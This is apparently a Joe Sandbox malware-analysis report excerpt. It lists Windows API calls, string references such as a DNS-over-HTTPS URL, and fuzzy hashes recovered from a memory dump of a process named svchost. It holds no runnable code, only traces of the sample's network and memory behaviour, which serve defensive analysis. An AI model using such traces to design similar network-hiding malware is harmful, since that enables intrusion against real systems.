                                                                                                                                                            • memcmp.MSVCRT(?,04D96F3C,00000008), ref: 04D75C4F
                                                                                                                                                            • memcmp.MSVCRT(?,04D96F18,00000009), ref: 04D75CCB
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: memcmp
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1475443563-0
                                                                                                                                                            APIs
                                                                                                                                                            • socket.WS2_32(00003A9A,00000001,00000000), ref: 04D7ADE5
                                                                                                                                                            • SetHandleInformation.KERNEL32(00000000,00000001,00000000,?,?,?,04D7BA4B,?,00000000,?,00000000,00000000,?,00000000), ref: 04D7AE22
                                                                                                                                                            • closesocket.WS2_32(00000000), ref: 04D7AE5D
                                                                                                                                                            • memset.MSVCRT ref: 04D7AE73
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 04D7AED4
                                                                                                                                                            • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000000), ref: 04D7AEE1
                                                                                                                                                            • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000000), ref: 04D7AEEB
                                                                                                                                                            • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000000), ref: 04D7AEF3
                                                                                                                                                            • closesocket.WS2_32(?), ref: 04D7AF17
                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 04D7AF25
                                                                                                                                                            • RegisterWaitForSingleObject.KERNEL32(00000154,?,04D7AF9E,00000000,000000FF,00000004), ref: 04D7AF62
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLast$Handleclosesocket$CloseInformationObjectRegisterSingleWaitmemsetsocket
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1241441197-0
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: htonsstrlen$callocinet_addrmemset
                                                                                                                                                            • String ID: https://cloudflare-dns.com/dns-query
                                                                                                                                                            • API String ID: 1536131324-770057447
                                                                                                                                                            APIs
                                                                                                                                                            • shutdown.WS2_32(?,00000001), ref: 04D7A9E0
                                                                                                                                                            • WSAGetLastError.WS2_32(?,00000000,?,04D79AC3,00000000,00000000,00000000,00000000,00000000,00000000,00000000,04D79A33,00000000,00000000,?,00000000), ref: 04D7A9F1
                                                                                                                                                            • closesocket.WS2_32(?), ref: 04D7AA67
                                                                                                                                                            • UnregisterWait.KERNEL32(?), ref: 04D7AAAC
                                                                                                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,?,04D79AC3,00000000,00000000,00000000,00000000,00000000,00000000,00000000,04D79A33,00000000), ref: 04D7AAC6
                                                                                                                                                            • free.MSVCRT ref: 04D7AAEC
                                                                                                                                                            • UnregisterWait.KERNEL32(?), ref: 04D7AB0D
                                                                                                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,?,04D79AC3,00000000,00000000,00000000,00000000,00000000,00000000,00000000,04D79A33,00000000), ref: 04D7AB1F
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseHandleUnregisterWait$ErrorLastclosesocketfreeshutdown
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3261266694-0
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLast$memset
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4054172246-0
                                                                                                                                                            APIs
                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,04D7CC99,?,000000FF,00000000,00000000), ref: 04D7C3B8
                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,04D7CC99), ref: 04D7C3F9
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,04D7CC99), ref: 04D7C404
                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,04D7CC99), ref: 04D7C40D
                                                                                                                                                            • WSASetLastError.WS2_32(00000000,?,?,?,04D7CC99), ref: 04D7C414
                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,04D7CC99), ref: 04D7C423
                                                                                                                                                            • WSASetLastError.WS2_32(00000000,?,?,?,04D7CC99), ref: 04D7C446
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLast$CloseHandle$CreateEventObjectSingleWait
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1659421480-0
                                                                                                                                                            APIs
                                                                                                                                                            • memcmp.MSVCRT(?,04D96EC0,0000000C), ref: 04D75DFF
                                                                                                                                                            • memcmp.MSVCRT(?,04D96EB0,0000000C), ref: 04D75E21
                                                                                                                                                            • memcmp.MSVCRT(?,04D96EA0,0000000C), ref: 04D75E43
                                                                                                                                                            • memcmp.MSVCRT(?,04D96E80,0000000C), ref: 04D75E83
                                                                                                                                                            • memcmp.MSVCRT(?,04D96E70,0000000C), ref: 04D75EA5
                                                                                                                                                            • memcmp.MSVCRT(?,04D96E60,0000000C), ref: 04D75EC7
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: memcmp
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1475443563-0
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: memcmp$callocfree
                                                                                                                                                            • String ID: factfmt RIFFdata
                                                                                                                                                            • API String ID: 254810267-2461439165
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: memset$calloc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1504270956-0
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: strchr$memset
                                                                                                                                                            • String ID: 0123456789ABCDEF$0123456789abcdef
                                                                                                                                                            • API String ID: 3020236661-885041942
                                                                                                                                                            APIs
                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,04D79C8B,00000000,04D7CC8C,04D7CCD3,04D97D20,04D7CCDB,04D7CC8C,00000000), ref: 04D79C9B
                                                                                                                                                            • InterlockedCompareExchange.KERNEL32(04D7CC90,00000000,00000000), ref: 04D79CAD
                                                                                                                                                            • SetEvent.KERNEL32(00000000,?,04D79C8B,00000000,04D7CC8C,04D7CCD3,04D97D20,04D7CCDB,04D7CC8C,00000000), ref: 04D79CBE
                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,04D79C8B,00000000,04D7CC8C,04D7CCD3,04D97D20,04D7CCDB,04D7CC8C,00000000), ref: 04D79CCA
                                                                                                                                                            • WaitForSingleObject.KERNEL32(04D7CC8C,000000FF,?,04D79C8B,00000000,04D7CC8C,04D7CCD3,04D97D20,04D7CCDB,04D7CC8C,00000000), ref: 04D79CD5
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Event$CloseCompareCreateExchangeHandleInterlockedObjectSingleWait
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4206309166-0
                                                                                                                                                            APIs
                                                                                                                                                            • memcmp.MSVCRT(?,04D96E30,0000000E), ref: 04D75F62
                                                                                                                                                            • memcmp.MSVCRT(?,04D96E20,0000000E), ref: 04D75F84
                                                                                                                                                            • memcmp.MSVCRT(?,04D96E10,0000000E), ref: 04D75FA6
                                                                                                                                                            • memcmp.MSVCRT(?,04D96E00,0000000E), ref: 04D75FC8
                                                                                                                                                            • memcmp.MSVCRT(?,04D96DF0,0000000E), ref: 04D75FEA
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: memcmp
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1475443563-0
                                                                                                                                                            APIs
                                                                                                                                                            • memcmp.MSVCRT(?,04D96DE0,0000000F), ref: 04D76025
                                                                                                                                                            • memcmp.MSVCRT(?,04D96DD0,0000000F), ref: 04D76043
                                                                                                                                                            • memcmp.MSVCRT(?,04D96DC0,0000000F), ref: 04D76065
                                                                                                                                                            • memcmp.MSVCRT(?,04D96DB0,0000000F), ref: 04D76087
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: memcmp
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1475443563-0
                                                                                                                                                            APIs
                                                                                                                                                            • memset.MSVCRT ref: 04D74236
                                                                                                                                                            • getaddrinfo.WS2_32(?,00000000,?,00000000), ref: 04D74259
                                                                                                                                                            • htons.WS2_32(00000006), ref: 04D742BE
                                                                                                                                                            • FreeAddrInfoW.WS2_32(00000000), ref: 04D742D5
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddrFreeInfogetaddrinfohtonsmemset
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 928751204-0
                                                                                                                                                            APIs
                                                                                                                                                            • WSARecv.WS2_32(?,?,00000001,00000000,?,00000000,00000000), ref: 04D7B732
                                                                                                                                                            • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000000), ref: 04D7B7E3
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLastRecv
                                                                                                                                                            • String ID: E'
                                                                                                                                                            • API String ID: 904507345-3751625834
                                                                                                                                                            • Opcode ID: fbea2923f2aa126f8b819a87fb989b304bc57ef50ca55010b04bfc6c85ef0369
                                                                                                                                                            • Instruction ID: 92695f2ecb8acb519450b2411ea5ca26d2e77e2e3c2c57683ecbec9cf08bf528
                                                                                                                                                            • Opcode Fuzzy Hash: fbea2923f2aa126f8b819a87fb989b304bc57ef50ca55010b04bfc6c85ef0369
                                                                                                                                                            • Instruction Fuzzy Hash: 55818371500708AFEB349F55C885AAA77F8FF0436CF044A1FE99686690F735F9858B90
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: strlen$callocfree
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3898528724-0
                                                                                                                                                            • Opcode ID: 49a7b89c939da9cc68ebabb4e09e42fec64b23cafba51b3217e05e127845cb9a
                                                                                                                                                            • Instruction ID: c5cfcd73e8107a8f1298afcaf64632756903356dffcf9ea4e59ad9ba79b575c0
                                                                                                                                                            • Opcode Fuzzy Hash: 49a7b89c939da9cc68ebabb4e09e42fec64b23cafba51b3217e05e127845cb9a
                                                                                                                                                            • Instruction Fuzzy Hash: D5012DB1708702AEEB30AB759C90B6777DAEB44255F00082EF659C2241FB31E9009662